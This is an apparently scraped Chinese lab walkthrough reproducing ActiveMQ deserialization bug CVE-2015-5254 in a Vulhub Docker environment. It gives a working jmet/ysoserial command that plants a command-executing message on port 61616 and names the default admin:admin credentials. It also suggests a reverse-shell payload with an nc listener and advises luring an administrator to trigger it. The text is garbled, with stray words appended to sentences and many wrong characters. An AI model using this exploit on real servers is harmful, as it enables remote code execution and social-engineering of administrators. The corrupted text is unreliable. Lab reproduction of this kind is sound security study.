利用Vulnhub复现漏洞 - ActiveMQ 反序列化漏洞（CVE-2015-5254）

Vulnhub官方复现教程

https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.mdjava

漏洞原理

https://www.jianshu.com/p/564fb8b54a67git

Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。github

Apache ActiveMQ 5.13.0以前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。web

参考连接：docker

• https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf

复现漏洞

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056shell

环境运行后，将监听61616和8161两个端口。其中61616是工做端口，消息在这个端口进行传递；8161是Web管理页面端口。
访问安全

http://your-ip:8161

【注意】本文中全部的your-ip请改成本身的IP地址
可看到web管理页面，不过这个漏洞理论上是不须要web的。bash

Terminal

漏洞利用过程以下：并发

1. 构造（可使用ysoserial）可执行命令的序列化对象
2. 做为一个消息，发送给目标61616端口
3. 访问web管理页面，读取消息，触发漏洞

使用jmet进行漏洞利用。首先下载jmet的jar文件，放在哪里并不重要。注意在同目录下建立一个external文件夹（不然可能会爆文件夹不存在的错误）。jsp

cd JiangBuLiu/Penetration/ActiveMQ\(CVE-2015-5254\)/

不知道文件下载到哪里，能够经过

updatedb && locate jmet-0.1.0-all.jar

找到后进入该文件夹，最好使用ls查看是否有external文件夹

jmet原理是使用ysoserial生成Payload并发送（其jar内自带ysoserial，无需再本身下载），因此咱们须要在ysoserial是gadget中选择一个可使用的，好比ROME。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

Firefox

此时会给目标ActiveMQ添加一个名为event的队列，咱们能够经过

http://your-ip:8161/admin/browse.jsp?JMSDestination=event

（ActiveMQ Web管理页面默认帐号密码是admin:admin）
看到这个队列中全部消息：

点击查看这条消息便可触发命令执行

进入对应文件夹（仍是老样子，不知道路径就updatedb+locate）

cd ~/vulhub/activemq/CVE-2015-5254

进入容器

docker-compose exec activemq bash

查看是否建立成功

ls /tmp/

见/tmp/success已成功建立，说明漏洞利用成功：

将命令替换成弹shell语句再利用：

nc -l -p 21

值得注意的是，【经过web管理页面访问消息并触发漏洞】这个过程须要管理员权限。 默认密码：admin/admin 在没有密码的状况下，咱们能够诱导管理员访问咱们的连接以触发，或者假装成其余合法服务须要的消息，等待客户端访问的时候触发。